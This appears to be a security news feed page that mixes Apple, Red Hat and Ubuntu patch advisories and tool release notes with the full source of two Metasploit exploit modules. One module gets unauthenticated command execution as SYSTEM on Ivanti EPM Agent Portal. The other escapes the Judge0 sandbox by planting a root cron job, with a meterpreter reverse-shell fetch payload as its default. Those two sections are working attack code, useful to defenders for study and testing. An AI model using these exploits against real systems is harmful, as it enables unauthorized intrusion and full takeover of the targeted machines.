Apple Security Advisory 11-19-2024-4 - iOS 17.7.2 and iPadOS 17.7.2 addresses code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2iOS 17.7.2 and iPadOS 17.7.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121754.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.JavaScriptCoreAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited on Intel-based Mac systems.Description: The issue was addressed with improved checks.WebKit Bugzilla: 283063CVE-2024-44308: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupWebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to a crosssite scripting attack. Apple is aware of a report that this issue mayhave been actively exploited on Intel-based Mac systems.Description: A cookie management issue was addressed with improved statemanagement.WebKit Bugzilla: 283095CVE-2024-44309: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 17.7.2 and iPadOS 17.7.2".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmc9JGcACgkQX+5d1TXaIvqaMhAArOKmA61hgLNGofjznuKQo6Jc42iPl7a/ZiB2Tq5ynZKPIGmGiM3HdJQ8bbifOgpkmNcA3h1OUlXnnkbdehq6d8MzI9WSn6uHdgWZ5LqLMXOWgsEF5Hwwmm7zaqTaqMv4fV2J6w2wTcoL5XptxGXiEi37/GzcureD3hvL+nRAAzR6c/gRXmcEjGL7pVTNJA0C8VyY9kG+Uc7ia2m5Riux2jsYzWYppPfCwUFeo3bQDexG7WsiHa00OZN+HkNS5/1t/7hftJZ+w/PbVnEK23Dm962NQgCrcFKGnbjNGJQlIjl+xfbi6BuQ6lJJZAI+3WqPHXLAMCcae/DfERqXWnJu8fTMfCwCbQVx185Cih+mtH0oc4MtPtiZdhi8TxZpVGZHYjLJa9VANTrNzkAmFflnhAC4tAG2FXx3ld3t/8u9Fhv0oyTa5HlzVYJ/WJgK32eT7I1h7Oqrp49KZcMIM8H6ZwNXYOI+Rf7GXdEN2y9Qhb+IOvdilTrCTpzRl6Gu6fBwH0G0UGHRktnBPlryJdOg26J1iVBZg6/K/CSjQizWdDXN/Nq4YwI17Eq4HtFdtOtrs5n0bDz+fsfGbsieTyUz1BUet2xLzPECfD4nYEKmckD1d/dRylc3vK9YGOCp1nWDoPSKnmkU9Il2SFAIuEM9o60lCN7PMWBrC9zYXMAxFmY==+VKC-----END PGP SIGNATURE-----

Apple Security Advisory 11-19-2024-4

Red Hat Security Advisory 2024-9689-03 - An update for binutils is now available for Red Hat Enterprise Linux 8. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9689.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: binutils security updateAdvisory ID:        RHSA-2024:9689-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9689Issue date:         2024-11-21Revision:           03CVE Names:          CVE-2018-12699====================================================================Summary: An update for binutils is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The binutils packages provide a collection of binary utilities for the manipulation of object code in various object file formats. It includes the ar, as, gprof, ld, nm, objcopy, objdump, ranlib, readelf, size, strings, strip, and addr2line utilities.Security Fix(es):* binutils: heap-based buffer overflow in finish_stab in stabs.c (CVE-2018-12699)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2018-12699References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=1595427

Red Hat Security Advisory 2024-9689-03

Red Hat Security Advisory 2024-9679-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include code execution, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9679.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: webkit2gtk3 security update  
Advisory ID:        RHSA-2024:9679-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:9679  
Issue date:         2024-11-21  
Revision:           03  
CVE Names:          CVE-2022-32885  
====================================================================

Summary: 

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.

Security Fix(es):

* webkitgtk: Memory corruption issue when processing web content (CVE-2022-32885)

* webkitgtk: arbitrary javascript code execution (CVE-2023-40397)

* webkitgtk: Arbitrary Remote Code Execution (CVE-2023-42917)

* webkitgtk: type confusion may lead to arbitrary code execution (CVE-2024-23222)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-42852)

* chromium-browser: Use after free in ANGLE (CVE-2024-4558)

* webkitgtk: webkit2gtk: Use after free may lead to Remote Code Execution (CVE-2024-40776)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-40789)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40780)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40779)

* webkitgtk: webkit2gtk: Use-after-free was addressed with improved memory management (CVE-2024-40782)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27808)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27820)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27833)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27851)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-44185)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-44244)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-32885

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2236842  
https://bugzilla.redhat.com/show_bug.cgi?id=2238945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253058  
https://bugzilla.redhat.com/show_bug.cgi?id=2259893  
https://bugzilla.redhat.com/show_bug.cgi?id=2271456  
https://bugzilla.redhat.com/show_bug.cgi?id=2279689  
https://bugzilla.redhat.com/show_bug.cgi?id=2301841  
https://bugzilla.redhat.com/show_bug.cgi?id=2302067  
https://bugzilla.redhat.com/show_bug.cgi?id=2302069  
https://bugzilla.redhat.com/show_bug.cgi?id=2302070  
https://bugzilla.redhat.com/show_bug.cgi?id=2302071  
https://bugzilla.redhat.com/show_bug.cgi?id=2314697  
https://bugzilla.redhat.com/show_bug.cgi?id=2314698  
https://bugzilla.redhat.com/show_bug.cgi?id=2314700  
https://bugzilla.redhat.com/show_bug.cgi?id=2314704  
https://bugzilla.redhat.com/show_bug.cgi?id=2323263  
https://bugzilla.redhat.com/show_bug.cgi?id=2323278

Red Hat Security Advisory 2024-9679-03

Red Hat Security Advisory 2024-9678-03 - An update for squid is now available for Red Hat Enterprise Linux 9.4 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9678.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security updateAdvisory ID:        RHSA-2024:9678-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9678Issue date:         2024-11-21Revision:           03CVE Names:          CVE-2024-45802====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Denial of Service processing ESI response content (CVE-2024-45802)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-45802References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2322154

Red Hat Security Advisory 2024-9678-03

Apple Security Advisory 11-19-2024-3 - iOS 18.1.1 and iPadOS 18.1.1 addresses code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1iOS 18.1.1 and iPadOS 18.1.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121752.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.JavaScriptCoreAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited on Intel-based Mac systems.Description: The issue was addressed with improved checks.WebKit Bugzilla: 283063CVE-2024-44308: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupWebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to a crosssite scripting attack. Apple is aware of a report that this issue mayhave been actively exploited on Intel-based Mac systems.Description: A cookie management issue was addressed with improved statemanagement.WebKit Bugzilla: 283095CVE-2024-44309: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 18.1.1 and iPadOS 18.1.1".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmc9JA8ACgkQX+5d1TXaIvrGzw/+PXf2fGgzCN5of6OYK0sWiJRRLZoL0uSZ9dOaD7I0/CyAx91Mv4OyH9Vveo9k84ZABNk4IO401WWLM8XSRSVILTcskT+SdXZrtOMYvmtUHUPKI35OWf1GBFdkgfnnFSRYf/B+WWb4PV0iO01lyFQVU5qDLcrUCAUQLwighfAX2yEn+Zml3NX6i2E5o2Rhc93Nac5a2cIcOGOSKrwsor0sh8NkAl9DcyPW6i6K3t59lUjiUY9XZQtEi6AyrChA84mo6Hb8wLwVIY17b8LVuruOSn3xg+Cc5eO5bOXp1O5lnR3dhuiZ2bl5BKawrp8+MDRsBZuTPS0k2Di3rmzuZ/GnvaQdtQKhcbOQ7tWW6evk/8TnFwlULaCr26OVbuLj0NWJ7GJYWpPuRWO0lFy9z9Fjdk4n+ptA7qmSWrhbdl+/uwUxJA5X58pVRWeWBExGP3S/ST/5YgAfZXBjHuDLiHKMOtQ3PktaMuEWhLFgGXNllXGQDihL4lS/XUQ1/E+mpWyY+kAbjtmCYlpez5MgeLkVv66yEWhOhsBMNIM+jkkRjktJo2SfhJMSryNLQlY37zn/VWf8Av+L60YoZhoMmx7DJLIr+HI257zbIE35CVZ+badn18d3eA+fq3RPtsDD8nlUePyZeNhEvc30Y5hXsIyK+Z0Ny+JgJfP1E6BeAJjjci0==ifwz-----END PGP SIGNATURE-----

Apple Security Advisory 11-19-2024-3

This Metasploit module leverages an unauthenticated remote command execution vulnerability in Ivanti's EPM Agent Portal where an RPC client can invoke a method which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM. This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkrequire 'rex/proto/ms_nrtp/client'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::Tcp  Rank = ExcellentRanking  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti EPM Agent Portal Command Execution',        'Description' => %q{          This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method          which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM.          This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.        },        'Author' => [          'James Horseman', # original poc          'Zach Hanley', # original poc          'Spencer McIntyre' # metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-28324'],          ['URL', 'https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US'],          ['URL', 'https://github.com/horizon3ai/CVE-2023-28324'],        ],        'Platform' => 'win',        'Arch' => ARCH_CMD,        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-06-07', # Ivanti article created date        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options([      Opt::RPORT(nil, true, 'The target port is not static. For more info, see this module\'s Verifications Steps in the docs.'),    ])    deregister_options('SSL')  end  def check    cwd = execute_command('echo %cd%', 0)    return CheckCode::Safe('Command execution failed.') unless cwd.to_s =~ /.:\\Windows\\System32/i    CheckCode::Vulnerable("Command execution test succeeded. Current working directory: #{cwd}")  rescue Rex::SocketError => e    CheckCode::Safe("MS-NRTP connection failed. #{e.class}: #{e.message}")  end  def exploit    execute_command(payload.raw)  end  def execute_command(command, result_delay = -1)    if @nrtp_client.nil?      @nrtp_client = client = IAgentPortal.new(        datastore['RHOST'],        datastore['RPORT'],        'LANDeskAgentPortal/LDSM',        context: { 'Msf' => framework, 'MsfExploit' => self }      )      client.connect      vprint_status('Connected to the remote end point')    else      client = @nrtp_client    end    client.do_request(command)    return nil unless result_delay >= 0    sleep result_delay    client.do_get_result  endendclass IAgentPortal < Rex::Proto::MsNrtp::Client  def recv_binary    Msf::Util::DotNetDeserialization::Types::SerializedStream.read(recv)  end  def send_recv_binary(serialized_stream)    send_binary(serialized_stream)    recv_binary  end  def do_request(shell_command)    ss_response = send_recv_binary(ss_request(shell_command))    method_return = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodReturn] }    method_return.record_value.return_value.val.value  end  def do_get_result    ss_response = send_recv_binary(ss_get_result)    ass = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleString] }    return nil unless ass    ass.record_value.members.first.record_value.string.value  end  private  def ss_get_result    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { major_version: 1 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              no_context: 1,              args_inline: 1            },            method_name: 'GetResult',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb',            args: [{ primitive_type_enum: Msf::Util::DotNetDeserialization::Enums::PrimitiveTypeEnum[:String], val: 'localhost' }]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd] }      ]    })  end  def ss_request(shell_command)    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { root_id: 1, header_id: -1, major_version: 1, minor_version: 0 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              method_signature_in_array: 1,              no_context: 1,              args_in_array: 1            },            method_name: 'Request',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb'          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 1, member_count: 2 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 2 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 3 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 2, member_count: 4 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 4, string: 'localhost' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 5 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 6, string: 'cmd.exe' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 7, string: "/c #{shell_command}" } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryArray], record_value: { obj_id: 3, binary_array_type_enum: 0, rank: 1, lengths: [4], type_enum: 3, additional_type_info: 'System.Type' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 9 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryLibrary], record_value: { library_id: 11, library_name: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 5, name: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum', member_count: 1, member_names: ['value__'] },            member_type_info: { binary_type_enums: [0], additional_infos: [8] },            library_id: 11,            member_values: [1]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SystemClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 8, name: 'System.UnitySerializationHolder', member_count: 3, member_names: ['Data', 'UnityType', 'AssemblyName'] },            member_type_info: { binary_type_enums: [1, 0, 1], additional_infos: [8] },            member_values: [{ record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 12, string: 'System.String' } }, 4, { record_type: 6, record_value: { obj_id: 13, string: 'mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' } }]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithId],          record_value: {            obj_id: 9,            metadata_id: 8,            member_values: [              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 14, string: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum' } },              4,              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 15, string: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } }            ]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd], record_value: {} }      ]    })  endend

Ivanti EPM Agent Portal Command Execution

Judge0 does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Judge0 sandbox escape',        'Description' => %q{          Judge0 does not account for symlinks placed inside the sandbox directory,          which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.        },        'Author' => [          'Tanto Security',    # Vulnerability discovery          'Takahiro Yokoyama'  # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-28185'],          ['CVE', '2024-28189'],          ['URL', 'https://tantosec.com/blog/judge0/'],        ],        'Payload' => {          'DisableNops' => true,          # https://github.com/judge0/judge0/blob/ad66f77b131dbbebf2b9ff8083dca9a68680b3e5/app/jobs/isolate_job.rb#L199          'BadChars' => '$&;<>|`'        },        'DefaultOptions' => {          'FETCH_DELETE' => false,          'WfsDelay' => 75        },        'Platform' => %w[linux],        'Targets' => [          [            'Linux Command', {              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-03-04',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(2358),      ]    )  end  def compile_language_ids    @languages = []    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'languages')    })    return unless res&.code == 200    languages = JSON.parse(res.body)    bash = languages.detect { |row| row['name'].include?('Bash') }    return unless bash    @bash_id = bash['id']    languages.each do |language|      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, "languages/#{language['id']}")      })      lang_info = JSON.parse(res.body)      @languages << language if res&.code == 200 && lang_info['compile_cmd'] && !lang_info['is_archived']    end    return if @languages.empty?    @languages  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'version')    })    return Exploit::CheckCode::Unknown unless res&.code == 200    version = Rex::Version.new(res.body)    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable") unless version <= Rex::Version.new('1.13.0')    print_status("Version #{version} detected, which is vulnerable")    return Exploit::CheckCode::Appears if compile_language_ids    Exploit::CheckCode::Unknown  end  def exploit    # Setting the `FETCH_DELETE` option seems to break the payload execution.    # `register_files_for_cleanup` will be used later to cleanup.    fail_with(Failure::BadConfig, 'FETCH_DELETE must be set to false') if datastore['FETCH_DELETE']    execute_command(payload.encoded)  end  def execute_command(cmd, _opts = {})    compile_language_ids if @languages.nil?    if @languages.empty? && !datastore['ForceExploit']      fail_with(Failure::Unknown, 'Failed to get compile language ids')    end    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'submissions?wait=true'),      'vars_post' => {        'source_code' => 'mv run runbak; ln -s /bin/rm run',        # if cannot get bash id but set ForceExploit to true, use 46        'language_id' => @bash_id || 46 # Bash      }    })    cron_path = '/etc/cron.d/' + rand_text_alpha(8)    print_status("Writing cron job to #{cron_path}")    # use random compile language ids    # if cannot get compile language ids but set ForceExploit to true, use 73 (Rust)    language = !@languages.empty? ? @languages.sample : { id: 73, name: 'Rust' }    print_status("Use language: #{language['id']}, #{language['name']}")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'submissions?wait=true'),      'vars_post' => {        'source_code' => "#test #{rand_text_alphanumeric(5..10)}",        'language_id' => language['id'],        'compiler_options' => "--version\nln -s /bin/rm ./run\n#",        'command_line_arguments' => "x\n"\                                    "cp /bin/rm #{cron_path}\n"\                                    "cp /usr/bin/unlink /bin/rm\n"\                                    "sed -i 's/.*/#/g' #{cron_path}\n"\                                    "sed -i \"2i #{cron_file(cmd)}\" #{cron_path}\n"\                                    "echo 'ok'\n" # not used      }    })    register_files_for_cleanup(cron_path, "/root/#{datastore['FETCH_FILENAME']}")  end  def cron_file(command)    cron_file = 'SHELL=/bin/sh'    cron_file << '\\n'    cron_file << 'PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin'    cron_file << '\\n'    cron_file << "* * * * * root #{command}"    cron_file << '\\n'    cron_file  endend

Judge0 Sandbox Escape

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Wireshark Analyzer 4.4.2

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about Falco as a mix between snort, ossec and strace.

Falco 0.39.2

Ubuntu Security Notice 7118-1 - It was discovered that ZBar did not properly handle certain QR codes. If a user or automated system using ZBar were tricked into opening a specially crafted file, an attacker could possibly use this to obtain sensitive information. It was discovered that ZBar did not properly handle certain QR codes. If a user or automated system using ZBar were tricked into opening a specially crafted file, an attacker could possibly use this to obtain sensitive information. This issue only affected Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

